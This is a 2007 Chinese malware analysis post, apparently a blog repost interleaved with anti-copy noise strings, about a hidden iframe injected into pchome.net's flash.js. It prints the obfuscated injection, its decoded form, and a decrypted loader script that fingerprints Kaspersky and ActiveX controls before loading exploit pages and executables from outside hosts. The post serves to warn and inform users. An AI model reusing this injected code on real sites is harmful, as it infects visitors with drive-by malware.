|
截至2007-12-28 18:17 仍未修复! p3 B, o% Y$ a' W
' y1 H3 U* M5 i1 K! e0 ?, D" I7 I2 y2 ^$ ~
##I#KE+X#D=$I#KE+XDI=KE+=X++D$IK#E#X+DI$KE+X=D=IK$E+$X=$D#I+$KEX$#DI+K#EXD=IKE+X#D#=I==K+E==XD+I#K$E$#X$D##I
& @5 L% b$ f% l. b9 b( K
. b% ~7 J2 N+ ^8 M从论坛看到的消息说pchome的某页面被挂马了,于是上去找,http://article.pchome.net/content-502393-7.html#topView ] n: ~$ J( A# Y* F3 x6 C
U" [1 [6 f8 E挂得比较隐蔽,http://btn.pchome.net/flash.js的中间被加入了如下代码:; W0 N) c( m0 q+ W8 h) e
/ z$ _+ |4 U1 t& R: iwindow["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]('\x3c\x69\x66\x72\x61\x6d\x65 \x68\x65\x69\x67\x68\x74\x3d\x30 \x77\x69\x64\x74\x68\x3d\x30 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x35\x39\x2e\x76\x63\x2f\x70\x61\x67\x65\x2f\x61\x64\x64\x5f\x36\x34\x34\x34\x35\x35\x2e\x68\x74\x6d\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');
3 ?% T P$ {; V! O
/ C7 P, C! R2 G1 f9 b也就是这个了:3 i) a- w: ^% ~5 B# s% U" o
P3 r) c7 ^) F2 _: r, r5 Xwindow["document"]["writeln"]('<iframe height=0 width=0 src="http://www.59.vc/page/add_644455.htm"></iframe>');
8 P9 g) B' G# j* b8 D# V; l, v
5 X- u5 w( X" A1 w3 z$ K. P但只有这个js还不会使得那个iframe生效,使得他生效的是调用这个js显示flash 的代码:
4 P5 Y) F9 t* j* C* J" M$ l% K( X0 p' z+ F) \& `2 j S8 a
<script language="javascript" type="text/javascript">% X6 W& u F; {$ V
writeflashhtml("_swf=http://btn.pchome.net/pchome/20071217/300_250.swf", "_width=300", "_height=250" ,"_wmode=opaque");' e. W# q# v# `9 l" _# w$ [ R
</script>
: H3 W( {# O$ f5 u! V. j3 P- ^+ m; a* _ x& [1 o7 z5 ^7 F# {4 }
有了这个,iframe就生效了;经过一番调用和解密后得:
( P" m5 Y0 q- {7 S4 T- m H. ?" ?, T/ B# ^/ c
function bIsKIS(){for(i=2;i<26;i++){var kis6=new Image();var kis7=new Image();var root=String.fromCharCode(65+i);kis6.src="mkMSITStore:"+root+":\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 6.0\\Doc\\context.chm::/images/help.gif";kis7.src="mkMSITStore:"+root+":\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 7.0\\Doc\\context.chm::/images/help.gif";if(kis6.height==41||kis7.height==41)return true}return false}var Then=new Date();aaxxx="xxxyyyyfassssfsadfasdf";Then.setTime(Then.getTime()+24*60*60*1000);var aaffdasfascookie=new String(document.cookie);var cookieHeader="Cookie1=";aaxxx="xxxyyyyfassssfsadfasdf";if(!bIsKIS()&&aaffdasfascookie.indexOf(cookieHeader)==-1){aaxxx="xxxyyyyfassssfsadfasdf";document.cookie="Cookie1=POPWINDOS;expires="+Then.toGMTString();aaxxx="xxxyyyyfassssfsadfasdf";try{if(new ActiveXObject("IERPCtl.IERPCtl.1"))document.write('<iframe style=display:none src="http://w18.vg/real.gif"></iframe>')}catch(e){}try{if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)document.write('<iframe style=display:none src="http://w18.vg/ms.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("DPClient.Vod"))document.write('<iframe style=display:none src="http://w18.vg/xl.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("GLCHAT.GLChatCtrl.1"))document.write('<iframe style=display:none src="http://w18.vg/lz.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("MPS.StormPlayer.1"))document.write('<iframe style=display:none src="http://w18.vg/bf.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("BaiduBar.Tool.1"))document.write('<iframe style=display:none src="http://w18.vg/baidu.gif"></iframe>')}catch(e){}}3 v& Y' o5 w, ~, ]* p
5 |% c. Y7 x4 S9 S8 @$ QK##E+XD++IK+EX=#D$IKEXD+$I#KEXDI+K$EX$DI$$KE##X#DI=K+E$X=$DI#K+#EX=DIK=E$=XDIK=$EX=DIK$E$#X=D=I##KE#=X+$D+
) U7 ?4 t; m$ j% b( j+ [; R1 q4 ^ d4 `5 b4 \+ n# b L
) A' \* W: M" `1 Y+ s' t4 X挑了几个解密得:http://w18.vg/s.exe& ^8 a* I9 y/ j" _- P! @
! ]7 B, Q0 I9 K1 m从这个文件里面得到另外一个链接:http://w18.vg/ss.exe; Q$ }3 ]% _" ?: K5 x8 _) h
$ N9 E4 Q/ g) ]# [- p- M有点面熟的东西……% r& Q3 r. V3 M/ v6 ~( G \5 M
0 n% }5 w; `" V: [5 v3 d, ]1 T' v##K=E#X+D=IKE$XD$=I==K+#EXD=#I=KE$+XDI#K$=EX=D=#IK+E=X$D==I=#K=E##X$D$+IK=#EXD+IK$EX$=D+I+K#E$XD+IKEX#D
, y/ l: D( I: A4 h3 s8 ?8 |1 E/ c- C: }
从上面可以知道,出问题的是那个flash.js,因此所有使用这个js来放flash的页面全都有毒了!我随便找了几个页面,发现都是有毒的,这回可是大面积的被挂咯,同志们自己小心了。0 \ |( d! u9 ?* ~' v
% Q7 h. R9 O7 V5 I, L6 O
K$EX=+DI#$KE+X#DIK$EXD$I=KE$XD+#I+KEXD=I+KE=X$D=I=KEXD#=IK==E$X=D=I#+KEXD=IK#EX#DI=K=E=X=#DIKEXDI#KE* G5 |4 @# Z7 d( w m5 D6 j
3 E. |) Z1 P$ `' d5 h9 |$ M转载请保留声明!(http://hi.baidu.com/dikex/blog/item/36300afa339a8c889e5146f5.html) - U( m8 n, y; q/ g6 B) \) j% ^
/ X$ D6 X3 R4 v t* b: H" Y4 V3 @0 f$ y/ n
作者dikex(六翼刺猬),原文链接:http://hi.baidu.com/dikex/blog/item/92f804c70762ead8d10060ff.html |
|